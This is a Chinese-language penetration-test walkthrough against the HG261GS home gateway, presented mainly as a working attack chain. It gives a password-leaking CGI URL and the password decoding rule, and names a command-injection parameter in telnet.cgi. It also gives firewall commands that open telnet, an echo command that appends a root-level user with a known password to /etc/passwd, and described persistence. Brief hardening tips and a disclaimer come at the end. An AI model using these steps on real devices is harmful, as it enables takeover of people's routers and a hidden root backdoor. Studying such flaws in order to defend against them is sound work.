天翼安全网关HG261GS渗透测试技术分析

1. 渗透测试概述

本次渗透测试针对天翼安全网关HG261GS设备，通过信息泄露漏洞获取管理员凭证，利用命令注入漏洞执行系统命令，最终成功开启telnet服务并添加系统用户。

2. 信息泄露漏洞利用

2.1 获取管理员密码

访问以下URL可获取设备密码信息：

http://192.168.1.1/cgi-bin/baseinfoSet.cgi

2.2 密码解密算法

获取的密码采用特定加密方式：

• 字母：ASCII码值+4
• 数字：直接使用ASCII码值

3. 命令执行漏洞

3.1 命令注入点

通过以下URL可执行系统命令：

http://192.168.1.1/cgi-bin/telnet.cgi

使用InputCmd参数传递要执行的命令

3.2 查看执行结果

执行结果可通过以下方式查看：

1. 直接访问：

http://192.168.1.1/cgi-bin/telnet_output.log

2. 通过JavaScript接口：

http://192.168.1.1/cgi-bin/submit.cgi

3.3 实用命令示例

查找所有CGI文件：

InputCmd=find%20/%20-name%20"*cgi*"

4. 开启telnet服务

4.1 发现telnet控制接口

通过命令搜索发现关键文件：

telnetenable.cgi

4.2 防火墙配置修改

1. 查看iptables规则：

iptables -L -n --line-numbers

2. 删除阻止23端口的规则（示例删除INPUT链第3条规则）：

iptables -D INPUT 3

3. 允许23端口通信：

iptables -A INPUT -p tcp --dport 23 -j ACCEPT

5. 添加系统用户

5.1 创建用户

直接修改/etc/passwd文件添加用户：

echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd

此命令创建用户名为test，密码为password@123的用户

5.2 关闭telnet服务

完成操作后关闭telnet服务：

killall telnetd >/dev/null 2>&1

6. 安全建议

1. 修改默认管理密码并使用强密码
2. 禁用不必要的CGI接口
3. 更新设备固件至最新版本
4. 限制管理界面访问IP
5. 定期检查系统日志和用户列表

7. 技术要点总结

1. 信息收集：通过特定URL获取敏感信息
2. 密码分析：理解并逆向加密算法
3. 命令注入：利用未过滤的输入参数执行系统命令
4. 权限提升：通过修改系统文件添加特权用户
5. 持久化访问：开启telnet服务实现长期控制

注意：本技术文档仅用于安全研究和防御目的，未经授权对他人设备进行渗透测试属于违法行为。